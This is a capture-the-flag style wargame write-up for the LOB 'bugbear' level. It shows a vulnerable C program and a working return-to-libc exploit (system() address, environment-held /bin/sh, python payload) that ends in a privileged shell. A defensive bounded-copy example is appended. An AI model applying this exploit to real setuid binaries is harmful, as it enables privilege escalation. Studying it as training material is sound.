LOB darkknight => bugbear
Problem
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
Hmm, this is an RTL (return-to-libc) problem.
Solution
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb)
Find the address of system.
[darkknight@localhost tmp]$ export bin="/bin/sh"
Put the /bin/sh string into an environment variable.
[darkknight@localhost tmp]$ ./zugbear
bin address is 0xbffffef0[darkknight@localhost tmp]$
[darkknight@localhost tmp]$ ./bugbear `python -c "print 'A'*44 + '\xe0\x8a\x05\x40' + 'AAAA' + '\xf0\xfe\xff\xbf'"`
Find the environment variable's address and use it in the attack.
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
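
Added example (not part of the original write-up or the wargame's code): a bounded copy that could replace the strcpy in bugbear.c, next to the original one-byte filter. It shows that the argv[1][47] check lets through any oversized input whose byte 47 is not 0xbf, such as the 0x40 top byte of the libc address above, while a length check rejects the argument regardless of content. The names copy_arg, filter_blocks, make_sample and the sample input are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40              /* same size as buffer[] in bugbear.c */

enum { COPY_OK = 0, COPY_BAD_ARG = -1, COPY_TOO_LONG = -2 };

/* Bounded replacement for strcpy(buffer, argv[1]): rejects input that
 * does not fit (including its NUL) instead of writing past dst. */
static int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    if (dst == NULL || src == NULL || dst_size == 0)
        return COPY_BAD_ARG;
    while (len < dst_size && src[len] != '\0')   /* never scans past dst_size */
        len++;
    if (len >= dst_size)
        return COPY_TOO_LONG;
    memcpy(dst, src, len + 1);
    return COPY_OK;
}

/* The original filter, with a length guard added so a short argument is
 * not indexed out of bounds. It inspects one byte only. */
static int filter_blocks(const char *arg)
{
    return strlen(arg) > 47 && (unsigned char)arg[47] == 0xbf;
}

/* Constructed sample: 52 bytes whose byte 47 is set by the caller. */
static void make_sample(char out[53], unsigned char byte47)
{
    memset(out, 'A', 52);
    out[47] = (char)byte47;
    out[52] = '\0';
}

int main(void)
{
    char buffer[BUF_SIZE], sample[53];

    make_sample(sample, 0x40);   /* top byte in the libc range, not 0xbf */
    printf("filter blocks: %d, bounded copy: %d\n",
           filter_blocks(sample), copy_arg(buffer, sizeof buffer, sample));
    make_sample(sample, 0xbf);   /* top byte in the stack range */
    printf("filter blocks: %d, bounded copy: %d\n",
           filter_blocks(sample), copy_arg(buffer, sizeof buffer, sample));
    return 0;
}
```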